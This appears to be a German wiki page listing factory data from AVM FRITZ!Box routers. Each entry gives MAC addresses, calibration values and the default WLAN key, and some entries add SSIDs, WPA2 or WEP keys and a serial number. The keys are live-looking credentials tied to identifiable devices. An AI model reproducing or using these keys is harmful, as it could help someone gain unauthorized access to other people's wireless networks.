macb		00:1A:4F:EF:35:9F
macwlan		00:04:0E:D4:DE:A6
macdsl		00:1A:4F:EF:35:A0

ProductID	Fritz_Box_7170
wlan_key	1107051658871926
wlan_cal	000D,03F2,0012,00E1,010A,00E5,010A,02F0,02E1
usb_board_mac	00:15:0C:42:F5:11
usb_rndis_mac	00:15:0C:42:F5:12
maca		00:15:0C:42:F5:0D
macb		00:15:0C:42:F5:0E
macwlan		00:15:0C:42:F5:0F
macdsl		00:15:0C:42:F5:10

ProductID	Fritz_Box_7170
wlan_key	5279813074956719
wlan_cal	03F9,0002,001E,00EA,010A,00EB,010A,034F,0346
usb_board_mac	00:1C:4A:DD:D7:A1
usb_rndis_mac	00:1C:4A:DD:D7:A2
maca		00:1C:4A:DD:D7:9E
macb		00:1C:4A:DD:D7:9F
macwlan		00:1C:4A:D1:AD:A6
macdsl		00:1C:4A:DD:D7:A0

ProductID	Fritz_Box_7170_AnnexA
wlan_key	6463043783873061
wlan_cal	03FF,03DA,0019,00EE,010A,00FF,010A,0344,03E0
usb_board_mac	00:04:0E:D0:59:8D
usb_rndis_mac	00:04:0E:D0:59:8E
maca		00:04:0E:D0:59:89
macb		00:04:0E:D0:59:8A
macwlan		00:04:0E:D0:59:8B
macdsl		00:04:0E:D0:59:8C

ProductID	Fritz_Box_7170
wlan_key	4481184995189258
wlan_cal	03F7,03D6,000F,00E6,010A,00EB,010A,0319,0316
usb_board_mac	00:15:0C:42:39:80
usb_rndis_mac	00:15:0C:42:39:81
maca		00:15:0C:42:39:7C
macb		00:15:0C:42:39:7D
macwlan		00:15:0C:42:39:7E
macdsl		00:15:0C:42:39:7F

ProductID	Fritz_Box_7170
wlan_key	7600644384968961
wlan_cal	001A,001A,000F,00EA,010A,00ED,010A,0338,033B
usb_board_mac	00:15:0C:C0:0A:36
usb_rndis_mac	00:15:0C:C0:0A:37
maca		00:15:0C:C0:0A:32
macb		00:15:0C:C0:0A:33
macwlan		00:15:0C:C0:0A:34
macdsl		00:15:0C:C0:0A:35

FRITZ!Box Fon WLAN 7270

SSID: FRITZ!Box Fon WLAN 7270   Key: 2411674463 (WPA2)
SSID: FRITZ!Box Fon WLAN 7270   Key: 0075741719022968   MAC: 0:1C:4A:4B:6D:54  SN: W024.293.00.015.072

FRITZ!Box Fon SL

SSID: FRITZ!Box   Key: 8051782785183 (WEP)

[Bearbeiten] BITTE EINORDNEN

Ist ein Router von AVM wegen MAC-Adresse

wlan_key	1196005733530232
wlan_cal	001B,0004,0019,00E8,010A,00E7,010A,035A,0362
usb_board_mac	00:04:0E:E3:EB:A5
usb_rndis_mac	00:04:0E:E3:EB:A6
maca		00:04:0E:E3:EB:A1
macb		00:04:0E:E3:EB:A2
macwlan        00:1F:3F:50:1B:0D
macdsl		00:04:0E:E3:EB:A4

[Bearbeiten] Fußnoten